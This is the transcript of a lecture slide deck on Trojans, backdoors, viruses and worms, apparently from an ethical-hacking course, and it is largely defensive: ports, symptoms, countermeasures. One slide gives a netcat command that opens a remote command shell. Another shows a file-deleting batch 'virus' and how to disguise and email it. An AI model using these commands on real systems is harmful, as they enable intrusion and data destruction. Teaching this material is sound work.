1 / 21

Chapter 5

Chapter 5. Trojans, Backdoors, Rootkits Viruses , and Worms. Definitions. Trojans: Programs that hide malicious code Backdoor: Way of accessing a computer without the security and authentication procedures that are normally required

yahto
Download Presentation

Chapter 5

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Chapter 5 Trojans, Backdoors, Rootkits Viruses, and Worms

  2. Definitions • Trojans: Programs that hide malicious code • Backdoor: Way of accessing a computer without the security and authentication procedures that are normally required • Rootkit: Modify the OS to conceal malicious programs while they run • Virus: self-replicating (within a machine) by producing its own code; attach copies of itself to other executable code • Worm: infects local and remote machines; spread automatically

  3. Some overlap • Example: Melisa “Virus” (1999) • Trojan: entered computers by masquerading as an email • Virus: infected word processing files when opened • Worm: used Outlook to spread itself to user’s personal address book

  4. Trojans and Backdoors • Trojan: • Malicious program disguised as something benign • Often delivered as part of a “wrapper” process • Examples: • BackOrifice: 31337 or 31338 – “Cult of the Dead Cow” • NetBus: 12345, 12346, 20034 • Whack-a-mole: 12361 or 12362 • Delivered via: • NetBIOS remote install • Fake executables • ActiveX controls, VBScript, Java scripts • Spyware / Adware

  5. Trojans and Backdoors • Backdoor • Allows access to the system • Often delivered via a Trojan • May install a new service, or use an unused existing service • Remote Access Trojan (RAT)

  6. Overt & Covert Channels • Overt: normal and legitimate use • Covert: using programs in unintended way • Tunneling is a good way for Trojans to bypass IDS • Port redirectors: modify which ports are used • Datapipe (Linux) • Fpipe (Windows) • Port analyzing • Fport: • Identify unknown open ports and their associated applications

  7. Types of Trojans • Remote Access Trojans (RATs) • Data-Sending Trojans • Collect passwords & other confidential data • Eg: eBlaster • Destructive Trojans: destroy files or OS • DoS Trojans: cause DoS attack • Proxy Trojans: help hacker hide • FTP Trojans: connect via port 21 • Security Software Disabler Trojans • FireKiller 2000

  8. Reverse Connecting Trojans • External attacker accesses internal systems • QAZ: 7597 • Replaces Notepad.exe with Note.com • Tini: 7777; Windows Backdoor trojan allowing command prompt to anyone who connects • Donald Dick: 23476 or 23477 • NetBus: 12345, 12346, 20034, 23476 • Netcat: allows telnet session • Sample command: nc –L –p 5000 –t –e cmd.exe • SubSeven • BackOrifice 2000: 31337 • Firekiller 2000

  9. Symptoms of Trojans • Programs auto starting and running • Screen flips • Sudden reduction in system resources • Corrupt or missing files • CD-ROM drawer opens and closes • Wallpaper, background, etc changes • Unexpected/suspicious Web sites • Mouse moves by itself or pointer disappears • Taskbar disappears • Task Manager is disabled

  10. Scanning for Trojans • netstat –an • Back Orifice UDP 31337, 31338 • Deep Throat UDP 2140, 3150 • NetBus TCP 12345, 12346 • Whack-a-Mole TCP 12361, 12362 • NetBus 2 TCP 20034 • GirlFriend TCP 21544 • Sockets de Troie TCP 5000, 5001, 50505 • Masters Paradise TCP 3129, 40421, 40422 • 40423, 40426

  11. Scanning for Trojans • Devil TCP 65000 • Evil TCP 23456 • Doly Trojan TCP 1011, 1012, 1015 • Chargen UDP 9, 19 • Stealth Spy Phaze TCP 555 • NetBIOS datagram TCP, UDP 138 • Sub Seven TCP 6711, 6712, 6713 • ICQ Trojan TCP 1033 • MStream UDP 9325

  12. Scanning for Trojans • The Prayer 1.0 – 2.0 TCP 9999 • Online KeyLogger UDP 49301 • Portal of Doom TCP,UDP 10067, 10167 • Senna Spy TCP 13000 • Trojan Cow TCP 2001

  13. Netcat • Features: • Firewall testing, port scanning, create backdoor, identify services • Command line interface opens TCP and UDP • -d: detach from the console • -l –p [port]: creates a listening TCP port • -z: port scanning • -v: verbose mode • -e: run at any time • -L: auto restart after dropped connection • -u: switches to UDP

  14. Wrappers (Glueware) • Three things needed: • Legitimate Program • Trojan Program • Wrapper Program • Bundle Trojans with legitimate software • Trojan Man • Yet Another Binder • Predator Wrapper • Graffiti • EXE Maker • Restorator

  15. Trojan Countermeasures • Spyware detectors • Malwarebytes • Norton Internet Security • Fport • Tripwire • Check file signature, size, integrity • Dsniff: contains Trojans, collection of hacking tools • Windows Built-in Commands • Sigverif • SFC (system file checker): sfc /scannow • “What’s Running” or “What’s on My Computer?” • Be wary of free cleaning applications

  16. Viruses and Worms • International Computer Security Association (ICSA) • Sets standards for AV software • Virus: infects another file and spreads • Worm: • Does not need a carrier program • Often exists inside other files (like Word or Excel) • Examples: Nimda, I Love You

  17. Virus Types • Polymorphic: change signature to avoid detection – eg: Virut (requires reformat) • Stealth: hide • File: infects files that can load/execute (.exe, .com, .bin, .sys) • Armored: encrypted • Boot Sector: modifies master boot files • System Sector: affect the executable code of the disk • Program: infect .BIN, .COM, .EXE, .SYS files

  18. Virus Types • Macro: perform a sequence of actions when a particular app is triggered; eg: Excel • Tunneling: tunnel under antivirus software and hide • Multipartite: affects multiple targets • Dual Payload: • Eg: Chernobyl: changes 1st MB of HD to zero; replaces code of BIOS to garbage • Network: run code on remote systems • Source Code: not common, very hard to write due to different compilers and languages

  19. Writing a Virus • Example: • Batch file called Game.bat • text @ echo off • delete c:\windows\system32\*.* • delete c:\windows\*.* • Convert Game.bat to Game.com with ‘bat2com’ utility • Assign an icon with Windows file properties screen • Send as email attachment

  20. Virus Constructions Kits • Kefi’s HTML Virus Construction Kit • Virus Creation Laboratory v1.0 • The Smeg Virus Construction Kit • Rajaat’s Tiny Flexible Mutator v1.1 • Windows Virus Creation Kit v1.00

  21. Detecting Viruses & Worms • Scanning with UP TO DATE scanner • Use Sheep Dip or SocketShield • Isolate one computer from the network and run downloaded software there first • Integrity checking • Tripwire • With MD5 • Downside: can’t detect differences made by virus versus a bug • Testing antivirus software • EICAR.com • X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

More Related